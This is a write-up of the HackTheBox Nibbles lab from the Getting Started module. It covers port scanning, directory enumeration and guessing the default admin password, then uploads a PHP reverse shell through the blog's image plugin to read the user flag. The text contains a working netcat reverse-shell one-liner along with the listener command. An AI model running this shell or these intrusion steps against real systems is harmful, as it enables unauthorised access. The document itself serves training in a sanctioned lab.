Nibbles Initial Foothold

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Getting Started
🔗 Link: Nibbles Initial Foothold

❓Question¶

Gain a foothold on the target and submit the user.txt flag

📋 Walkthrough¶

Start using nmap to do a script scan

nmap -sVC [IP]

This is the output

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So there's a website on it. From section we know that there's a blog on path /nibbleblog/. Try to use gobuster and find interesting pages.

gobuster dir -u http://10.129.100.239/nibbleblog/ -w=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.100.239/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 309]
/.hta                 (Status: 403) [Size: 304]
/.htpasswd            (Status: 403) [Size: 309]
/admin                (Status: 301) [Size: 327] [--> http://10.129.100.239/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 329] [--> http://10.129.100.239/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 331] [--> http://10.129.100.239/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 329] [--> http://10.129.100.239/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/themes               (Status: 301) [Size: 328] [--> http://10.129.100.239/nibbleblog/themes/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

It seems to be an admin.php page. Into content folder there's a file named users.xml that provide to us a admin username. I tried different default password like admin:admin or admin:password. I found by guessing that the password is admin:nibbles. In content folder, there's also a folder plugins where all plugins are stored.

In the section We can see that can upload a reverse shell using a Plugin named My Image. Let's create a reverse shell using php

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [LOCAL_IP] 1234 >/tmp/f"); ?>

Now let's prepare a netcat connection

nc -lnvp 1234

Start the shell browsing on http://10.129.100.239/nibbleblog/content/private/plugins/my_image/image.php

$ $ whoami
nibbler
$

Let's get user.txt flag in nibbler home.

$ cd /home/nibbler 
$ ls
personal.zip
user.txt
$

Answer

[REDACTED]